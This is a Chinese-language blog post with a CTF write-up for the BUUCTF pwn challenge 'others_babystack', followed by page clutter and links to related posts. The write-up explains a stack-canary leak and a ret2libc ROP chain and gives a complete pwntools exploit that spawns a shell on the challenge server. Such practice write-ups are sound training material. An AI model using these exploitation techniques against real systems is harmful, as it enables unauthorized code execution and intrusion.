[BUUCTF]PWN——others_babystack

最新推荐文章于 2022-05-01 20:10:44 发布
最新推荐文章于 2022-05-01 20:10:44 发布
阅读量1.3k 收藏 1
点赞数 3
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/109776976
版权

others_babystack

附件

步骤:

  1. 例行检查,64位程序,开了挺多保护
    在这里插入图片描述
  2. 本地试运行一下程序
    在这里插入图片描述
  3. 64位ida载入,看main函数
    在这里插入图片描述
    1是read函数,存在栈溢出;2是puts函数,3退出

利用思路

  1. 泄露canary
    由于存在canary,我们首先要想办法泄露出它的值来绕过canary保护,puts函数在输出的时候是遇到’\x00’ 才会结束,我们都知道canary跟在ebp之后,因此我们直接填充‘a’到ebp,正好 可以把canary的截断符覆盖,再输出,就会连canary输出来了,成功泄露了canary。
r.sendlineafter(">>",'1')
payload='a'*(0x80+8)
r.sendline(payload)

r.sendlineafter('>>','2')
r.recvuntil('a\n')
canary=u64(r,recv(7).rjust(8,'\x00'))
print hex(canary)
  1. 获取shell
    在得到程序里的ebp之后,就可以利用普通的ret2libc的方式去获取shell了,(64位传参要用寄存器的顺序是rdi,rsi,rdx,rcx,r8,r9)
    我这里打算使用puts函数去泄露puts的got表,参数只有一个,因此只用到了一个rdi寄存器,找一下设置它值的指令ROPgadget --binary babystack |grep "pop rdi"

在这里插入图片描述
泄露puts函数的got表地址,找到libc版本

pop_rdi=0x400a93
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
main_addr=0x400908

payload='a'*(0x80+8)+p64(canary)+p64(0)
payload+=p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
r.sendlineafter(">>",'1')
r.sendline(payload)
r.sendlineafter(">>",'3')

r.recv()

puts_addr=u64(r.recv(6).ljust(8,'\x00'))
libc=LibcSearcher('puts',puts_addr)

计算system和bin/sh在程序里的实际地址,构造rop攻击

libc_base=puts_addr-libc.dump('puts')
system=libc_base+libc.dump('system')
binsh=libc_base+libc.dump('str_bin_sh')

payload='a'*(0x80+8)+p64(canary)+p64(0)
payload+=p64(pop_rdi)+p64(binsh)+p64(system)
r.sendlineafter('>>','1')
r.sendline(payload)
r.sendlineafter('>>','3')

完整exp

from pwn import *
from LibcSearcher import *

r=remote('node3.buuoj.cn',28530)
#r=process('./babystack')
elf=ELF('./babystack')
context.log_level='debug'

#泄露canary
r.sendlineafter(">>",'1')
payload='a'*(0x80+8)
r.sendline(payload)

r.sendlineafter('>>','2')
r.recvuntil('a\n')
canary=u64(r.recv(7).rjust(8,'\x00'))
print hex(canary)

pop_rdi=0x400a93
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
main_addr=0x400908

#泄露puts函数的got表地址
payload='a'*(0x80+8)+p64(canary)+p64(0)
payload+=p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
r.sendlineafter(">>",'1')
r.sendline(payload)
r.sendlineafter(">>",'3')

r.recv()

puts_addr=u64(r.recv(6).ljust(8,'\x00'))

#找到对应的libc版本
libc=LibcSearcher('puts',puts_addr)

#计算system函数和字符串‘/bin/sh’在程序里的实际地址
libc_base=puts_addr-libc.dump('puts')
system=libc_base+libc.dump('system')
binsh=libc_base+libc.dump('str_bin_sh')

#构造rop攻击获取shell
payload='a'*(0x80+8)+p64(canary)+p64(0)
payload+=p64(pop_rdi)+p64(binsh)+p64(system)
r.sendlineafter('>>','1')
r.sendline(payload)
r.sendlineafter('>>','3')

r.interactive()

在这里插入图片描述

Angel~Yan
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
cipher_CIPHER_
09-29
this is document for Hi3520D
BUU 论坛的编辑器163Editor
09-21
BUU 论坛的编辑器DianUbb.rar
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影“灰姑娘”中的咒语“ Bibidi Barbidibou”,分为三个,Bibi是制片人,Babidi是去除魔鬼印记的人,Buu成了魔鬼的名字。 以下是您将获得的其他功能的列表:-待办事项列表-设置您喜欢的壁纸-发现新的热点-书签-社交网络通知-每个新标签的高品质壁纸-时钟显示日期和时间-天气小部件-打开搜索 支持语言:English,中文 (简体),中文 (繁體)
others_babystack
、moddemod
07-19 437
exp from pwn import * from LibcSearcher import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() def store(content): p.sendlineafter('>> ', str(1)) p.send(content) def print(): p.sendlineafter(..
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 363
buuctf-pwn 001-016题wp
BUUCTF others babystack
m0_57754423的博客
02-07 1736
思路: 通过覆盖canary的截断字符"\x00",从而连带打印出canary 而后就是简单的ret2libc了 exp: from pwn import * #p = remote("node4.buuoj.cn",29299) p = process("./babystack") elf = ELF("./babystack") context.log_level ="debug" #libc = ELF("libc-2.23.so") libc = ELF("/lib/x86_64-li
BUUCTF pwn wp 56 - 60
fa1c4的blog
10-09 210
others_babystack 绕过canary然后栈溢出 from pwn import * from LibcSearcher import * url, port = "node4.buuoj.cn", 26959 filename = "./babystack" elf = ELF(filename) # libc = ELF("./") context(arch="amd64", os="linux") # context(arch="i386", os="linux") local =
BUUCTF刷题2
m0_51251108的博客
05-22 351
gyctf_2020_borrowstack: 关键词:栈迁移 使用可控制的地址覆盖ebp的值,使用leave;ret指令所在地址覆盖ret的值,迁移后要填充4或8 read的时候用send 这题首先注意: 1.bss段离plt,got很近,要适当抬高迁移的位置 3.用system拿,估计还得要栈迁移,麻烦,用og简单, from pwn import* r=remote('node3.buuoj.cn',26005) #r=process('./gyctf_2020_borrowstack') conte
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
AVR系列单片机Mage8PWM脉冲输出程序
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问题
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
PWN.rar_pulse verilog_pulse width_verilog hdl
09-20
Pulse Width modulation using Verilog HDL
mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7
09-23
pwn信号发生器的源代码和仿真图,该程序可实现频率可调,占空比可调的pwm信号
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值